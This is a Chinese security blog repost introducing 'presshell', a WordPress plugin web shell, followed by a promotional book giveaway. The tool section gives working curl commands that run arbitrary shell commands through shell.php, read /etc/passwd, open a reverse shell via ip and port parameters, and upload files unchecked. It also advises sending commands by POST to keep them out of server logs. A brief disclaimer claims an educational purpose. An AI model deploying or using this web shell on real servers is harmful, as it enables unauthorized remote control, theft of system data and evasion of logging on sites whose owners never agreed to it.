神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】

admin 2023年2月3日02:35:31评论21 views字数 2012阅读6分42秒阅读模式

在您的 wordpress 服务器上执行 shell 命令。上传的 shell 可能会在

<your-host>/wp-content/plugins/shell/shell.php

神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】


安装

要安装 shell,我们假设您拥有 Wordpress 的管理权限并且可以安装插件,因为将 PHP 文件传输到媒体库无论如何都不应该工作。否则,你有一个更大的问题。

只需将位于 Releases 部分的 zip 文件作为新扩展上传,您就可以开始使用了。


用法

使用 shell 很简单。只需将 sh命令作为参数传递给 shell:

curl ' http://host/.../shell.php?cmd=uname+-a ' Linux wordpress-server 2.6.32-21-generic-pae # 32-Ubuntu SMP Fri Apr 16 09:39:35 UTC 2010 i686 GNU/Linux


您也可以在 POST 请求中传递这些参数,这是将命令排除在日志之外的推荐方法。

curl ' http://host/.../shell.php ' --data-urlencode ' cmd=ls ' LICENSE README.md shell.php


还支持更复杂的命令,但请注意您的引用。

curl ' http://host/.../shell.php ' --data-urlencode ' cmd=cat /etc/passwd | grep -v "(false|nologin)" ' root:x:0:0:root:/root:/bin/bash sync:x:4:65534:sync:/bin:/bin/sync

curl ' http://host/.../shell.php ' --data-urlencode ' cmd=python -c "from urllib.parse import urlencode; print(urlencode({"cmd": "uname -a"}))" ' cmd=uname+-a


您还可以使用ip和port参数打开反向 shell。默认端口是443.

curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 '

curl ' http://host/.../shell.php ' --data-urlencode ' ip=127.0.0.1 ' --data-urlencode ' port=1337 '
为了方便,还提供了一个选项,可以无条件地将文件上传到插件的目录,而无需检查。

curl 'http://host/.../shell.php' -F 'file=@some_file'curl 'http://host/.../shell.php' --data-urlencode 'cmd=ls'LICENSEREADME.mdshell.phpsome_file


对公共或私人服务器进行未经授权的攻击是非法的。此存储库的内容仅用于教育目的,如果不正确使用所提供的材料,作者将不承担任何责任。


项目地址:https://github.com/scheatkode/presshell


神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】


神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】粉丝福利神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】


 为了感谢大家一直以来的关注与支持,会有四本书籍免费赠送神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】


神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】书籍介绍:

一:《Web安全攻防从入门到精通》

神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】

我们都生活在移动互联网时代,个人信息、企业信息、政府信息都暴露在互联网之下。一旦有居心叵测的人攻破网络,会造成无法估量的损失。Web安全攻防从入门到精通》结合红日安全团队的多年经验,深入讲解Web安全的相关知识。

全书共有21个章节,第1章到第6章讲解Web攻防入门知识,包括HTTP基本概念、工具实战、信息收集、靶场搭建等内容;第7章到第20章讲解Web渗透测试的14个典型漏洞案例,包括SQL注入、XSS漏洞、CSRF漏洞、SSRF漏洞、任意文件上传、业务漏洞等内容;第21章是项目实战,主要模拟真实Web安全评估项目。
《Web安全攻防从入门到精通》案例丰富,代码详实,实战性强,适合广大Web程序员、测试工程师、安全运营人员学习使用,也适合安全相关的培训、教育机构作为教材使用。

神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】规则如下:

     1.  转发朋友圈,中奖后转发视为无效。

     2. 私聊文末公众号发送“抽奖”即可扫描参与抽奖,注意看是发送暗号“抽奖”。

     3. 中奖者不满足条件1,请不要加运营微信兑奖了哦。

     4. 活动截止时间10月12日 12:00点,到时候还要中奖者及时联系号主发送你的中奖核验二维码、朋友圈转发截图、收货地址、姓名以及手机号,好给您发送书籍哦!


注:

1. 24小时内未联系号主视为自动放弃!改头像、微信名字等骗书行为出版社将永久拉黑!

2. 未在开奖前将本文转发朋友圈的,中奖是为无效,请不要加运营微信兑奖了哦。


先转发本文到朋友圈,然后私信发送“抽奖” 即可马上扫描参与抽奖神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】


原文始发于微信公众号(橘猫学安全):神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月3日02:35:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   神兵利器 - presshell【文末赠书-Web安全攻防从入门到精通】http://cn-sec.com/archives/1342206.html

发表评论

匿名网友 填写信息